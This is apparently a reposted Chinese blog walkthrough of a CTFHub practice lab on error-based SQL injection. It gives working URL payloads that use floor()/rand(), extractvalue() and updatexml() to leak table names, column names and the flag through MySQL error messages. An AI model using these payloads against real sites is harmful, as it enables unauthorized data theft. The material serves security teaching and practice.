博客
关于我
CTFHub_技能树_Web之SQL注入——报错注入(含三种解法)
阅读量:793 次
发布时间:2019-03-25

本文共 2285 字,大约阅读时间需要 7 分钟。

报错注入是一种在Web应用中揭示数据库信息的技术,主要通过利用特定的函数来构造自查错误,进而获取所需数据。本文将详细介绍报错注入的原理及其使用的函数,并通过实际示例展示注入过程。

一、报错注入原理

报错注入运作的核心在于利用某些数据库函数对输入参数进行处理,导致发至数据库的查询语句中包含所需的信息。以下是常用函数的原理:

1. floor()原理

floor()函数用于向下取整。对于报错注入,可以利用该函数获取特定信息。例如,当构造一个查询时,使用floor函数将随机数域与信息数据结合,通过报错信息提取出表名或其他数据库信息。

2. extractvalue()、updatexml()原理

这两个函数主要用于处理XML数据。extractvalue()用于从XML中提取指定路径的数据,而updatexml()则用于修改XML数据,返回修改后的内容。通过将数据库查询嵌入到这些函数的参数中,可以控制报错信息,从而获取所需数据或信息。

二、注入过程示例

Ⅰ、使用floor()

  • 查询表名

    ?id=1 and(select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x)a)

    该查询尝试获取当前数据库中的表名。floor(rand(0)*2)生成一个随机数域,结合information_schema.tables中表名,通过报错信息提取出表名。

    报错示例:

    Duplicate entry 'flag1' for key 'group_key'

    通过注入过程,可以发现数据库中包含多个表,需要进一步限制查询范围。

  • 查询列名

    ?id=1 and(select 1 from(select count(*),concat((select column_name from information_schema.columns where table_name="flag"),floor(rand(0)*2))x from information_schema.tables group by x)a)

    该查询针对已知的表名获取列名。通过报错信息,可以查看具体的列是否存在,并提取列名。

  • 查值

    ?id=1 and(select 1 from(select count(*),concat((select flag from flag),floor(rand(0)*2))x from information_schema.tables group by x)a)

    该查询用于从表中获取特定的字段值。通过报错信息,可以获取字段值。

  • Ⅱ、使用extractvalue()

  • 查询表名

    ?id=1 and (extractvalue(1,concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 1,1))))

    该查询尝试提取指定路径中的内容。使用0x5c生成反斜杠,结合table_name,形成有效的XPATH路径,提取表名。

    报错示例:

    XPATH syntax error: '\flag'

    通过修正XPATH路径,可以正确提取表名。

  • 查询列名

    ?id=1 and (extractvalue(1,concat(0x5c,(select column_name from information_schema.columns where table_name="flag"))))

    该查询用于获取指定表的列名。通过构造有效的XPATH路径,提取列名。

  • 查值

    ?id=1 and (extractvalue(1,concat(0x5c,(select flag from flag))))

    该查询用于获取特定字段的值。通过构造有效的XPATH路径,提取字段值。

  • Ⅲ、使用updatexml()

  • 查询表名

    ?id=1 and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1))

    该查询尝试修改XML数据中的内容。通过构造标签和特定路径,通过报错信息获取表名。

    报错示例:

    XPATH syntax error: '~flag~'

    通过修正标签,确保XPATH路径正确,可以交互获取所需信息。

  • 查询列名

    ?id=1 and(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name="flag"),0x7e),1))

    该查询用于获取指定表的列名。通过构造有效的标签和XPATH路径,提取列名。

  • 查值

    ?id=1 and(updatexml(1,concat(0x7e,(select flag from flag),0x7e),1))

    该查询用于获取特定字段的值。通过构造有效的标签和XPATH路径,提取字段值。

  • 转载地址:http://gppuk.baihongyu.com/

    你可能感兴趣的文章
    MySQL 备份 Xtrabackup
    查看>>
    mYSQL 外键约束
    查看>>
    mysql 多个表关联查询查询时间长的问题
    查看>>
    mySQL 多个表求多个count
    查看>>
    mysql 多字段删除重复数据,保留最小id数据
    查看>>
    MySQL 多表联合查询:UNION 和 JOIN 分析
    查看>>
    MySQL 大数据量快速插入方法和语句优化
    查看>>
    mysql 如何给SQL添加索引
    查看>>
    mysql 字段区分大小写
    查看>>
    mysql 字段合并问题(group_concat)
    查看>>
    mysql 字段类型类型
    查看>>
    MySQL 字符串截取函数,字段截取,字符串截取
    查看>>
    MySQL 存储引擎
    查看>>
    mysql 存储过程 注入_mysql 视图 事务 存储过程 SQL注入
    查看>>
    MySQL 存储过程参数:in、out、inout
    查看>>
    mysql 存储过程每隔一段时间执行一次
    查看>>
    mysql 存在update不存在insert
    查看>>
    Mysql 学习总结(86)—— Mysql 的 JSON 数据类型正确使用姿势
    查看>>
    Mysql 学习总结(87)—— Mysql 执行计划(Explain)再总结
    查看>>
    Mysql 学习总结(88)—— Mysql 官方为什么不推荐用雪花 id 和 uuid 做 MySQL 主键
    查看>>